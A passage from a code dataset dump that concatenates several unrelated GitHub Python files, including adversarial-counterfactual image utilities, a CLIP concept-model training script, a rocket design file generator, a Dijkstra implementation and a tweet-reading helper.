ActivationAPGDAttack(\n model, \n eps=eps, \n n_iter=steps, \n norm=norm, \n loss=loss, \n n_restarts=n_restarts, \n verbose=False, \n seed=seed,\n last_layer=last_layer,\n eigenvecs=eigenvectors,\n target_cls=target_cls,\n device=device,\n reg_other=reg_other,\n ica_components=ica_components,\n ica_mean=ica_mean,\n minimize=minimize,\n minimize_abs=minimize_abs)\n\n losses = [] if return_losses else None\n cfs = {}\n if return_losses:\n adv_samples, loss = adv_attack.perturb(\n images,\n perturbation_targets, \n best_loss=True,\n x_init=x_init)\n adv_samples, loss = adv_samples.detach(), loss.detach()\n losses.append(loss)\n else:\n adv_samples = adv_attack.perturb(\n images,\n perturbation_targets, \n best_loss=True,\n x_init=x_init)[0].detach()\n \n if result_path is not None:\n path = result_path + f\"/adv_samples_{norm}_eps_{eps}_target_{target_cls}\"\n torch.save(adv_samples.detach(), path)\n else:\n cfs = adv_samples.detach()\n\n if result_path is None:\n if return_losses:\n return cfs, losses\n return cfs\n\ndef compute_diff_image(a,b, filepath=None):\n diff = (a - b).sum(2)\n min_diff_pixels = diff.min()\n max_diff_pixels = diff.max()\n min_diff_pixels = -max(abs(min_diff_pixels), max_diff_pixels)\n max_diff_pixels = -min_diff_pixels\n diff_scaled = (diff - min_diff_pixels) / (max_diff_pixels - min_diff_pixels)\n cm = plt.get_cmap('seismic')\n colored_image = cm(diff_scaled.numpy())\n pil_img = Image.fromarray(np.uint8(colored_image * 255.))\n if not filepath is None:\n pil_img.save(filepath)\n return pil_img\n\ndef compute_diff_act(a,b, filepath=None):\n diff = a - b\n min_diff_pixels = diff.min()\n max_diff_pixels = diff.max()\n min_diff_pixels = -max(abs(min_diff_pixels), max_diff_pixels)\n max_diff_pixels = -min_diff_pixels\n diff_scaled = (diff - min_diff_pixels) / (max_diff_pixels - min_diff_pixels)\n cm = plt.get_cmap('seismic')\n if type(diff_scaled) != np.ndarray:\n diff_scaled = diff_scaled.numpy()\n colored_image = cm(diff_scaled)\n return colored_image\n\n\ndef imagenet_confidence_all(model, device, fpath='results/pipeline/all_conf', batch_size=128, n_workers=8):\n for target_class in range(1000):\n confidences = []\n with torch.no_grad():\n train_loader, _ = data.imagenet_subset(target_class, batch_size=batch_size, n_workers=n_workers)\n\n for batch_idx, (img, lab) in enumerate(train_loader):\n out = model(img.to(device))\n prob = torch.softmax(out, dim=1).cpu().detach().numpy()\n\n confidences.append(prob)\n \n confidences = np.concatenate(confidences, axis=0)\n np.save(f'{fpath}/conf_class_{target_class}.npy', confidences)\n\n\ndef select_start_class(target_class, k=1, fpath='results/pipeline/all_conf', verbose=False, only_geo=False):\n target_conf_means = []\n candidates = [970, 972, 973, 974, 975, 976, 977, 978, 979, 980] if only_geo else range(1000)\n for in_class in candidates:\n confidences = np.load(f'{fpath}/conf_class_{in_class}.npy')\n target_conf_means.append(np.mean(confidences[:, target_class]))\n\n target_conf_means = np.array(target_conf_means)\n sorted_idcs = np.flip(np.argsort(target_conf_means).copy())\n \n if only_geo:\n similar_idcs = np.array(candidates)[sorted_idcs[:k]]\n else:\n if target_class in sorted_idcs[:k]:\n target_flag = False\n for i in range(k):\n if sorted_idcs[i] == target_class:\n target_flag = True\n if target_flag:\n sorted_idcs[i] = sorted_idcs[i+1]\n similar_idcs = sorted_idcs[:k]\n if verbose:\n for i, idx in enumerate(similar_idcs):\n print(idx, data.imagenet_label2class[idx], target_conf_means[i])\n return similar_idcs, target_conf_means[sorted_idcs[:k]]\n\n\ndef create_results_dir(results_path):\n if not os.path.exists(results_path):\n os.makedirs(results_path)\n return results_path\n","repo_name":"YanNeu/spurious_imagenet","sub_path":"neural_pca/counterfactual.py","file_name":"counterfactual.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"} +{"seq_id":"22270769393","text":"import pygame\nfrom py.var import constante\n\ndef initialize():\n \"\"\"\n initialize pygame\n \"\"\"\n screen = pygame.display.set_mode((constante[\"width\"],constante[\"height\"]), pygame.FULLSCREEN) \n pygame.display.set_caption(constante['name_of_game'])\n #icon_32x32 = pygame.image.load(\"icon.ico\").convert_alpha() \n #pygame.display.set_icon(icon_32x32) \n clock = pygame.time.Clock() \n ms = clock.tick(constante[\"fps\"]) \n return screen,clock","repo_name":"victordalet/python-fight-game","sub_path":"py/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35117719893","text":"import sys\n\n\nN = int(sys.stdin.readline())\ngrades = []\nfor _ in range(N):\n grade = list(sys.stdin.readline().split())\n grade[1] = int(grade[1])\n grade[2] = int(grade[2])\n grade[3] = int(grade[3])\n grades.append(grade)\n\ngrades.sort(key=lambda x: (-x[1], x[2], -x[3], x[0]))\n\nfor idx, value in enumerate(grades):\n sys.stdout.write(value[0] + \"\\n\")\n","repo_name":"Gyusik-Choi/algorithm","sub_path":"baekjoon/10825_국영수/B_10825.py","file_name":"B_10825.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11445897288","text":"import argparse\nimport os\nimport pickle\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nfrom sklearn.metrics import accuracy_score, roc_auc_score\nfrom data import get_dataset\nfrom concepts import ConceptBank\nfrom models import PosthocLinearCBM, get_model\nfrom training_tools import load_or_compute_projections\nimport clip\nfrom torchvision import datasets, transforms\nfrom sklearn.linear_model import SGDClassifier\nimport torch.nn as nn\n\n# Define the configuration for the model\ndef config():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--concept-bank\", required=True, type=str, help=\"Path to the concept bank\")\n parser.add_argument(\"--out-dir\", required=True, type=str, help=\"Output folder for model/run info.\")\n parser.add_argument(\"--dataset\", default=\"cub\", type=str)\n parser.add_argument(\"--backbone-name\", default=\"resnet18_cub\", type=str)\n parser.add_argument(\"--device\", default=\"cuda\", type=str)\n parser.add_argument(\"--seed\", default=42, type=int, help=\"Random seed\")\n parser.add_argument(\"--batch-size\", default=128, type=int)\n parser.add_argument(\"--num-workers\", default=1, type=int)\n parser.add_argument(\"--alpha\", default=0.99, type=float, help=\"Sparsity coefficient for elastic net.\")\n parser.add_argument(\"--lam\", default=1e-5, type=float, help=\"Regularization strength.\")\n parser.add_argument(\"--lr\", default=1e-5, type=float)\n parser.add_argument(\"--num-epochs\", default=30, type=int)\n parser.add_argument(\"--momentum\", default=0.9, type=float)\n parser.add_argument(\"--weight-decay\", default=1e-4, type=float)\n return parser.parse_args()\n\nclass ModelWrapper(nn.Module):\n def __init__(self, pcbm, clip_model, resolution):\n super(ModelWrapper, self).__init__()\n self.pcbm = pcbm\n self.clip_model = clip_model\n \n # Define the preprocessing pipeline within the ModelWrapper\n self.preprocess = transforms.Compose([\n transforms.Resize(resolution, interpolation=transforms.InterpolationMode.BICUBIC),\n transforms.CenterCrop(resolution),\n transforms.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711))\n ])\n\n def forward(self, images):\n features = self.clip_model.encode_image(images)\n out = self.pcbm(features.float().to(args.device), return_dist = False)\n return out\n\n\n# Function to evaluate the model\ndef evaluate(pcbm, clip_model, test_loader, criterion, preprocess, device):\n pcbm.eval()\n clip_model.eval()\n total_loss = 0\n all_predictions = []\n all_labels = []\n\n with torch.no_grad():\n for inputs, labels in test_loader:\n #inputs = preprocess(inputs).to(device)\n inputs, labels = inputs.to(device), labels.to(device)\n \n # Forward pass through PCBM\n features = clip_model.encode_image(inputs)\n features = features.float().to(device)\n #print(\"Features dtype:\", features.float().to(device).dtype)\n #print(\"Features dtype in evaluate:\", features.dtype) # Debugging print\n\n # Check the data type of pcbm parameters\n #for name, param in pcbm.named_parameters():\n #print(f\"{name} dtype: {param.dtype}\") # Debugging print\n\n outputs = pcbm(features)\n\n # Compute loss\n loss = criterion(outputs, labels)\n total_loss += loss.item()\n\n # Store predictions and labels\n predictions = outputs.argmax(dim=1)\n all_predictions.extend(predictions.cpu().numpy())\n all_labels.extend(labels.cpu().numpy()) \n\n avg_loss = total_loss / len(test_loader)\n accuracy = accuracy_score(all_labels, all_predictions)\n return avg_loss, accuracy\n\n# Main function\ndef main(args):\n # Define the save directory\n save_dir = \"/data/gpfs/projects/punim2103/joint_training\"\n # Ensure the save directory exists\n os.makedirs(save_dir, exist_ok=True)\n\n #_, preprocess = get_model(args, backbone_name=args.backbone_name)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n # Load CLIP model\n clip_model, preprocess = clip.load('RN50', device)\n clip_model = clip_model.to(args.device)\n clip_model.visual.train()\n #for param in clip_model.parameters():\n #param.requires_grad = False\n \n \n # Load dataset\n #preprocess = transforms.ToTensor()\n train_loader, test_loader, idx_to_class, classes = get_dataset(args, preprocess)\n\n # Load concept bank\n concept_bank = pickle.load(open(args.concept_bank, 'rb'))\n concept_bank = ConceptBank(concept_bank, args.device)\n\n # Load PCBM \n pcbm = torch.load('/data/gpfs/projects/punim2103/train_results/pcbm_cifar10__clip:RN50__broden_clip:RN50_0__lam:0.0002__alpha:0.99__seed:42.ckpt', map_location=device)\n\n criterion = torch.nn.CrossEntropyLoss()\n val_loss, val_accuracy = evaluate(pcbm, clip_model, test_loader, criterion, preprocess, args.device)\n\n # Print epoch results\n print(f\"Evaluation before training: Validation Loss: {val_loss:.4f}, Validation Accuracy: {val_accuracy:.4f}\")\n\n #optimizer = torch.optim.Adam(wrapped_model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n optimizer = torch.optim.SGD(pcbm.trainable_params(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n \n for epoch in range(args.num_epochs):\n print(f'Epoch {epoch+1}/{args.num_epochs}')\n\n \n\n # Step 4: Training loop for CLIP model\n for inputs, labels in train_loader:\n # inputs = preprocess(inputs).to(device)\n inputs, labels = inputs.to(device), labels.to(device)\n\n optimizer.zero_grad()\n\n # Forward pass through PCBM\n features = clip_model.encode_image(inputs)\n features = features.float().to(device)\n out = pcbm(features)\n\n # Backpropagation\n \n loss = criterion(out, labels)\n loss.backward() \n optimizer.step()\n\n print(\"Evaluating...\")\n val_loss, val_accuracy = evaluate(pcbm, clip_model, test_loader, criterion, preprocess, args.device)\n\n # Print epoch results\n print(f\"Epoch {epoch+1}/{args.num_epochs}, Validation Loss: {val_loss:.4f}, Validation Accuracy: {val_accuracy:.4f}\")\n\n # Save the final model\n final_model_path = os.path.join(save_dir, 'final_model.pth')\n torch.save({\n 'clip_model_state_dict': clip_model.state_dict(),\n 'pcbm_model_state_dict': pcbm.state_dict(),\n }, final_model_path)\n\n print(f\"Model saved to {final_model_path}\")\n\n\nif __name__ == \"__main__\":\n args = config()\n main(args)","repo_name":"MariaBulychev/Thesis_5","sub_path":"dustbin/train_pcbm_joint_5.py","file_name":"train_pcbm_joint_5.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42558566471","text":"from __future__ import print_function\nfrom openmdao.api import Component, FileRef\nfrom pprint import pprint\nfrom os import listdir, path\nfrom xml.etree import ElementTree as ET\nfrom random import uniform\n\nclass GenORK(Component):\n \"\"\" Creates ORK file from OpenMETA config imputs.\"\"\"\n\n def __init__(self):\n super(GenORK, self).__init__()\n\n #Python wrapper inputs\n self.add_param('payload_mass', val=0.0)\n self.add_param('coneshape', val=0.0, description='nosecone shape', pass_by_obj=True)\n self.add_param('noselen_coeff', val=0.0)\n self.add_param('bodylen_coeff', val=0.0)\n self.add_param('fintype', val=0.0, description='planform fin shape', pass_by_obj=True)\n self.add_param('fincount', val=0.0, description='number of fins', pass_by_obj=True)\n self.add_param('finprofile', val=0.0, description='fin profile', pass_by_obj=True)\n self.add_param('motorclass', val=0.0, description='class of motor', pass_by_obj=True)\n self.add_param('material', val=0.0, description='material used', pass_by_obj=True)\n self.add_param('density', val=0.0, description='density of material [kg/m^3]', pass_by_obj=True)\n self.add_param('finish', val=0.0, description='finish used', pass_by_obj=True)\n self.add_param('launchrodlength', val=0.0)\n\n # Output: ORK File\n self.add_output('ORK_File', FileRef('test.ork'), binary=True, pass_by_obj=True)\n\n\n def pull_template(self):\n \"\"\" Locastes advanced_template.ork and loads into memory for use.\"\"\"\n dir = path.dirname(path.realpath(__file__))\n temp_path = path.join(dir, 'template.ork')\n tree = ET.parse(temp_path)\n return tree\n\n\n def write_ork(self, tempXML):\n \"\"\"saves .ork file to specific result folder\"\"\"\n counter = 1\n temp_path = \"test.ork\"\n tempXML.write(temp_path, \"utf-8\", True)\n\n\n def edit_simulation(self, tempXML, launchrodlength):\n \"\"\" edits xml values for simulation(s).\"\"\"\n simroot = tempXML.find('./simulations/simulation/conditions')\n launchrodElem = simroot.find('launchrodlength')\n launchrodElem.text = str(launchrodlength)\n\n\n def edit_motordata(self, tempXML, motorclass):\n \"\"\" Remove all unsed motorclasses, save maximum used motor dimesions as variables.\"\"\"\n rocketElem = tempXML.find('.//rocket')\n simElem = tempXML.find('.//simulations')\n motormountRoot = tempXML.find('.//innertube/motormount')\n motorlist = rocketElem.findall('motorconfiguration')\n simlist = simElem.findall('simulation')\n motormountlist = motormountRoot.findall('motor')\n motorsizeList = list()\n\n # remove elements using unselected motorclasses\n for motor in motorlist:\n motorconfigid = motor.attrib['configid']\n motorname = (motor.find('name')).text\n if motorclass not in motorname:\n rocketElem.remove(motor)\n for motor in motormountlist:\n if motor.attrib['configid'] == motorconfigid:\n motormountRoot.remove(motor)\n for sim in simlist:\n simconfigidElem = sim.find('conditions/configid')\n if simconfigidElem.text == motorconfigid:\n simElem.remove(sim)\n else:\n for motor in motormountlist:\n if motor.attrib['configid'] == motorconfigid:\n motorsizeList.append([(motor.find('length')).text, (motor.find('diameter')).text])\n\n # store maximum motor dimensions\n for elem in motorsizeList:\n if elem == motorsizeList[0]:\n elem1 = elem\n elif elem == motorsizeList[1]:\n elem2 = elem\n len_comparrison = max(elem1[0], elem2[0])\n diam_comparrison = max(elem1[1], elem2[1])\n else:\n len_comparrison = max(len_comparrison, elem[0])\n diam_comparrison = max(diam_comparrison, elem[1])\n max_motordimensions = [float(len_comparrison), float(diam_comparrison)]\n return max_motordimensions\n\n\n def edit_bodytubes(self, tempXML, motor_dimensions, material, density, finish, bodylen_coeff, payload_mass, coneshape):\n \"\"\" Edits all bodytube dimensions, material, and finish.\"\"\"\n bodytubeList = tempXML.findall(\".//bodytube\")\n for bodytube in bodytubeList:\n bodyroot = bodytube\n (bodyroot.find('finish')).text = finish\n (bodyroot.find('material')).text = material\n (bodyroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n tubetype = (bodytube.find('name')).text\n if tubetype == 'Payload tube':\n self.edit_payloadtube(bodytube, motor_dimensions, bodylen_coeff, payload_mass)\n elif tubetype == 'Recovery tube':\n self.edit_recoverytube(bodytube, motor_dimensions, bodylen_coeff)\n elif tubetype == 'Engine tube':\n self.edit_enginetube(tempXML, bodytube, motor_dimensions, bodylen_coeff, coneshape, material, density, finish)\n\n def edit_payloadtube(self, bodyroot, motor_dimensions, bodylen_coeff, payload_mass):\n payloadtubelen_scale = 2\n payloadtubelen_offset = 1.5\n tube_radius = (motor_dimensions[1]/2.0 + 0.005)/0.9\n tube_thickness = 0.10*tube_radius\n payloadtubelen_ratio = bodylen_coeff*payloadtubelen_scale + payloadtubelen_offset\n calc_len = payloadtubelen_ratio*float(motor_dimensions[0])\n (bodyroot.find('length')).text = str(calc_len/3.0)\n bodyroot.find('subcomponents/masscomponent/mass').text = str(payload_mass)\n \"==========Edit internal Components==========\"\n bulkheadRoot = bodyroot.find(\"subcomponents/tubecoupler/subcomponents/bulkhead\")\n (bulkheadRoot.find(\"position\")).text = str(-0.015)\n (bulkheadRoot.find(\"length\")).text = str(0.015)\n (bulkheadRoot.find(\"outerradius\")).text = str(tube_radius - tube_thickness)\n\n\n def edit_recoverytube(self, bodyroot, motor_dimensions, bodylen_coeff):\n recoverytubelen_scale = 1\n recoverytubelen_offset = 0.75\n recoverytubelen_ratio = bodylen_coeff*recoverytubelen_scale + recoverytubelen_offset\n calc_len = recoverytubelen_ratio*float(motor_dimensions[0])\n (bodyroot.find('length')).text = str(calc_len)\n\n \"==========Edit internal Components==========\"\n chuteList = bodyroot.findall(\"subcomponents/parachute\")\n shockcordList = bodyroot.findall(\"subcomponents/shockcord\")\n for chute in chuteList:\n if (chute.find(\"name\")).text == \"Drogue chute\":\n (chute.find(\"packedlength\")).text = str(0.20)\n (chute.find(\"packedradius\")).text = str(0.025)\n (chute.find(\"diameter\")).text = str(1.484)\n\n elif (chute.find(\"name\")).text == \"Main chute\":\n (chute.find(\"packedlength\")).text = str(0.21)\n (chute.find(\"packedradius\")).text = str(0.03)\n (chute.find(\"diameter\")).text = str(1.985)\n\n for shockcord in shockcordList:\n if (shockcord.find(\"name\")).text == \"Ripchord drogue chute\":\n (shockcord.find(\"position\")).text = str(-0.01)\n (shockcord.find(\"packedlength\")).text = str(0.01)\n (shockcord.find(\"packedradius\")).text = str(0.0275)\n (shockcord.find(\"cordlength\")).text = str(0.6)\n\n elif (shockcord.find(\"name\")).text == \"Ripchord main chute\":\n (shockcord.find(\"position\")).text = str(0.0)\n (shockcord.find(\"packedlength\")).text = str(0.02)\n (shockcord.find(\"packedradius\")).text = str(0.0275)\n (shockcord.find(\"cordlength\")).text = str(1.5)\n\n def edit_enginetube(self, tempXML, bodyroot, motor_dimensions, bodylen_coeff, coneshape, material, density, finish):\n \"\"\" Edit continuous values for the engine tube and subcomponents with resepect to motor values.\"\"\"\n (bodyroot.find('length')).text = str(1.5*motor_dimensions[0] - 1.095*(motor_dimensions[1]/2.0))\n tube_radius = (motor_dimensions[1]/2.0 + 0.005)/0.9\n tube_thickness = 0.10*tube_radius\n (bodyroot.find('radius')).text = str(tube_radius)\n (bodyroot.find('thickness')).text = str(tube_thickness)\n\n \"==========Edit internal Components==========\"\n #Transition\n transroot = tempXML.find('.//transition')\n (transroot.find('shape')).text = coneshape\n (transroot.find('finish')).text = finish\n (transroot.find('material')).text = material\n (transroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (transroot.find('length')).text = str((tube_radius - tube_thickness)/0.5774)\n (transroot.find('thickness')).text = str(tube_thickness)\n (transroot.find('aftradius')).text = str(motor_dimensions[1]/2.0 + 0.0005)\n #Motorsleeve\n innertubeRoot = tempXML.find('.//innertube')\n (innertubeRoot.find('length')).text = str(motor_dimensions[0])\n (innertubeRoot.find('outerradius')).text = str(motor_dimensions[1]/2.0 + 0.0005)\n (innertubeRoot.find('thickness')).text = str(0.0005)\n\n #engine block\n engineblockRoot = tempXML.find('.//engineblock')\n (engineblockRoot.find('material')).text = material\n (engineblockRoot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (engineblockRoot.find('length')).text = str(3*tube_thickness)\n (engineblockRoot.find('outerradius')).text = str(tube_radius - tube_thickness)\n (engineblockRoot.find('position')).text = str(-3*tube_thickness)\n (engineblockRoot.find('thickness')).text = str(6*tube_thickness)\n\n # centering rings\n centeringringlist = tempXML.findall('.//centeringring')\n for centeringringElem in centeringringlist:\n (centeringringElem.find('material')).text = material\n (centeringringElem.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (centeringringElem.find('length')).text = str(2*tube_thickness)\n (centeringringElem.find('outerradius')).text = str(tube_radius - tube_thickness)\n (centeringringElem.find('innerradius')).text = str(motor_dimensions[1]/2.0 + 0.0005)\n if (centeringringElem.find('name')).text == \"Forward centering ring\":\n (centeringringElem.find('position')).text = str(motor_dimensions[0]/3)\n elif (centeringringElem.find('name')).text == \"Aft centering ring\":\n (centeringringElem.find('position')).text = str(-motor_dimensions[0]/3)\n\n def edit_finset(self, tempXML, material, density, finish, fintype, fincount, finprofile, motor_dimensions):\n \"\"\" Removes excess finset, edits values for fins.\"\"\"\n bodytubeList = tempXML.findall(\".//bodytube\")\n tube_radius = (motor_dimensions[1]/2.0 + 0.005)/0.9\n tube_thickness = 0.10*tube_radius\n for bodyroot in bodytubeList:\n tubetype = (bodyroot.find('name')).text\n bodysubroot = bodyroot.find(\".//subcomponents\")\n if tubetype == 'Engine tube':\n if fintype == 'trapezoidfinset':\n bodysubroot.remove(bodysubroot.find('ellipticalfinset'))\n finsetRoot = bodysubroot.find('trapezoidfinset')\n (finsetRoot.find('material')).text = material\n (finsetRoot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (finsetRoot.find('finish')).text = finish\n (finsetRoot.find('fincount')).text = str(int(fincount))\n (finsetRoot.find('thickness')).text =str(0.005) #half cm\n (finsetRoot.find('crosssection')).text = finprofile\n (finsetRoot.find('rootchord')).text = str(motor_dimensions[0]/1.25)\n (finsetRoot.find('tipchord')).text = str(3*motor_dimensions[0]/8.0)\n (finsetRoot.find('height')).text = str(2*tube_radius)\n\n if fintype == 'ellipticalfinset':\n bodysubroot.remove(bodysubroot.find('trapezoidfinset'))\n finsetRoot = bodysubroot.find('ellipticalfinset')\n (finsetRoot.find('material')).text = material\n (finsetRoot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (finsetRoot.find('finish')).text = finish\n (finsetRoot.find('fincount')).text = str(int(fincount))\n (finsetRoot.find('thickness')).text =str(0.005) #half cm\n (finsetRoot.find('crosssection')).text = finprofile\n (finsetRoot.find('rootchord')).text = str(motor_dimensions[0]/2.0)\n (finsetRoot.find('height')).text = str(2*tube_radius)\n\n def edit_launchlug(self, tempXML, material, density, finish, fincount, motor_dimensions):\n \"\"\" Edits xml for the launchlug size.\"\"\"\n lugroot = tempXML.find('.//bodytube/subcomponents/launchlug')\n (lugroot.find('material')).text = material\n (lugroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (lugroot.find('finish')).text = finish\n (lugroot.find('length')).text = str(motor_dimensions[0]/10.0)\n if fincount == 3.0:\n (lugroot.find('radialdirection')).text = str(60.0)\n elif fincount == 4.0:\n (lugroot.find('radialdirection')).text = str(45.0)\n\n def edit_nosecone(self, tempXML, coneshape, material, density, finish, motor_dimensions, noselen_coeff):\n \"\"\" Edits xml for the nosecone and its subcomponents.\"\"\"\n noseroot = tempXML.find('.//nosecone')\n (noseroot.find('shape')).text = coneshape #change coneshape\n (noseroot.find('material')).text = material #change material name and density attrib\n (noseroot.find('material')).attrib['density'] = str(density) #converts kg/m^3 to g/cm^3\n (noseroot.find('finish')).text = finish # change finish\n noselen_scale = 2.0 #calculated relaitonship\n noselen_offset = 3.0 #calculated relaitonship\n noselen_ratio = noselen_coeff*noselen_scale + noselen_offset\n (noseroot.find('length')).text = str(noselen_ratio*float(motor_dimensions[1] + 0.01))\n\n\n def solve_nonlinear(self, params, unknowns, resids):\n \"\"\" This is the 'main' function.\"\"\"\n # set variables\n payload_mass = params['payload_mass']\n coneshape = params['coneshape']\n noselen_coeff = params['noselen_coeff']\n bodylen_coeff = params['bodylen_coeff']\n fintype = params['fintype']\n fincount = params['fincount']\n finprofile = params['finprofile']\n motorclass = params['motorclass']\n material = params['material']\n density = params['density']\n finish = params['finish']\n launchrodlength = params['launchrodlength']\n # create the template rocket file\n tempXML = self.pull_template()\n # remove all unused motors and save max motor dimensions\n motor_dimensions = self.edit_motordata(tempXML, motorclass)\n # edit bodytubes\n self.edit_bodytubes(tempXML, motor_dimensions, material, density, finish, bodylen_coeff, payload_mass, coneshape)\n # edit nosecone\n self.edit_nosecone(tempXML, coneshape, material, density, finish, motor_dimensions, noselen_coeff)\n #edit finsets\n self.edit_finset(tempXML, material, density, finish, fintype, fincount, finprofile, motor_dimensions)\n #edit launchlug\n self.edit_launchlug(tempXML, material, density, finish, fincount, motor_dimensions)\n #write file\n self.write_ork(tempXML)\n","repo_name":"metamorph-inc/openmeta-rocket","sub_path":"scripts/GenORK.py","file_name":"GenORK.py","file_ext":"py","file_size_in_byte":15948,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"37832279451","text":"import sys\n\nN = 8\ns = 0\ng = [None for i in range(N)]\ng[0] = [(1, 1), (3, 2)]\ng[1] = [(0, 1), (2, 4), (3, 3), (4, 1), (5, 6)]\ng[2] = [(1, 4), (5, 1), (6, 1), (7, 2)]\ng[3] = [(0, 2), (1, 3), (4, 5)]\ng[4] = [(1, 1), (3, 5), (6, 2)]\ng[5] = [(1, 6), (2, 1), (7, 9)]\ng[6] = [(2, 1), (4, 2), (7, 1)]\ng[7] = [(2, 2), (5, 9), (6, 1)]\n\nvisited = [False for i in range(N)]\nD = [sys.maxsize for i in range(N)]\nD[s] = 0\nprevious = [None for i in range(N)]\nprevious[s] = s\n\n# 코드 구조는 prim algorithm 과 거의 듀사하다\n# 다른부분은 최소거리값을 갱신하는 부분인데\n# 누적된 값을 구해서 거리를 비교하는 방식으로 동작한다.\n# 또한 prim 의 경우 visited=True 라는 의미가\n# 하나의 트리구조로 편입됫음을 의미해서 트리의 전체 edges 의 weight 를\n# 고려하는 방식이다. 이 때 visited=Ture 인 vertex 는 더이상\n# 최소비용 계산을 하지 않아도되는 고정된 값이지만\n# dijkstra 의 경우 visited=True 에 관계없이\n# 최소거리 값이 변할 수 있다는 점이 다르다.\nfor k in range(N):\n m = -1\n min_value = sys.maxsize\n for j in range(N):\n if not visited[j] and D[j] < min_value:\n min_value = D[j]\n m = j\n\n visited[m] = True\n\n for w, wt in g[m]:\n\n # if not visited[w] 라는 구문은 없다 왜?\n # 특정 vertex 까지의 최소 거리를 구하는 알고리즘에서는\n # 최소 거리를 얻는 거이 목적이기 때문에\n # 이미 방문/트리 의 유무에 관계없이 vertex 를 이용할 수 있다.\n # 따라서 이미 최소거리값(D[w])이 셋팅되어있고 visited=True더라도\n # 새로운 weight 로 갱신가능하다.\n if D[m] + wt < D[w]:\n D[w] = D[m] + wt\n previous[w] = m\n\nprint(f'정점 {s} 로부터의 최단거리: ')\nfor i in range(N):\n if D[i] == sys.maxsize:\n print(f'{s} 와 {i} 사이에 경로 없음')\n else:\n print(f'({s}, {i}) = {D[i]} ')\n\nprint(f'정점 {s} 로부터의 최단경로: ')\nfor i in range(N):\n back = i\n print(back, end='')\n while back != s:\n print(f' <- {previous[back]}', end='')\n back = previous[back]\n print()\n\nif __name__ == '__main__':\n pass\n","repo_name":"kimdohwan/MyStudy","sub_path":"data_structure_with_python/08_graph/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"11780595303","text":"from transformers import pipeline\nimport pandas as pd\n\n# use train.gender_bias.binary.csv / train.bias.ternary.csv / train.hate.csv\npipe = pipeline('text-classification', model='monologg/koelectra-base-v3-discriminator', device=0)\n\ndf = pd.read_csv('data/test.csv')\n\ndf['label'] = df['comments'].map(lambda x:pipe(x)[0])['label']\n\nprint(df.label.value_counts())\n\n# ex) hate-speech-detection\nLABEL_DIC = {\n 'none':0,\n 'offensive':1,\n 'hate':2,\n}\n\ndf['label'] = df['label'].map(lambda x:LABEL_DIC[x])\n\ndf.to_csv('./submission.csv', index=None)","repo_name":"glory-ju/juhyeon","sub_path":"ko-electra/kaggle.py","file_name":"kaggle.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17091386903","text":"from gobject import GObject, SIGNAL_RUN_LAST, TYPE_NONE\nfrom gobject import TYPE_PYOBJECT, SIGNAL_NO_RECURSE, SIGNAL_ACTION\nSCRIBES_SIGNAL = SIGNAL_RUN_LAST|SIGNAL_NO_RECURSE|SIGNAL_ACTION\n\nclass Manager(GObject):\n\n\t__gsignals__ = {\n\t\t\"destroy\": (SCRIBES_SIGNAL, TYPE_NONE, ()),\n\t\t\"activate\": (SCRIBES_SIGNAL, TYPE_NONE, (TYPE_PYOBJECT,)),\n\t}\n\n\tdef __init__(self, editor):\n\t\tGObject.__init__(self)\n\t\tself.__init_attributes(editor)\n\t\tfrom SmartSpace import SmartSpace\n\t\tSmartSpace(editor, self)\n\t\tfrom ConfigurationManager import Manager\n\t\tManager(editor, self)\n\n\tdef __init_attributes(self, editor):\n\t\tself.__editor = editor\n\t\treturn\n\n\tdef destroy(self):\n\t\tself.emit(\"destroy\")\n\t\tdel self\n\t\tself = None\n\t\treturn\n","repo_name":"mystilleef/scribes","sub_path":"GenericPlugins/SmartSpace/Manager.py","file_name":"Manager.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"32625911029","text":"from utils import *\n\n# Reading & Writing ND JSON files\ndef read_and_write(path) -> list:\n '''\n param path (str): directory where the input json file is\n return list_of_tweets (iterable): list containing tweets as json objects with relevant data read in from the file(s) within path input\n '''\n\n # List to store fields from the tweets\n list_of_tweets = []\n\n with zipfile.ZipFile(path , 'r') as infile:\n for geoEurope in infile.namelist(): \n # this goes inside the geoEurope folder\n with infile.open(geoEurope) as f: \n # iterate through each line , i.e. each tweet object\n for line in f: \n tweet = json.loads(line)\n \n # row-wise inclusion into a sub-list\n list_of_field = []\n\n # # User ID\n # try:\n # list_of_field.append(tweet.get('user').get('id')) # use id only if this takes up more mem/time\n # except AttributeError:\n # list_of_field.append(\"None\")\n\n # Timestamp (UTC)\n list_of_field.append(tweet.get('timestamp_ms'))\n\n # # Created At (Local Time)\n # list_of_field.append(tweet.get('created_at'))\n\n # Tweet ID\n 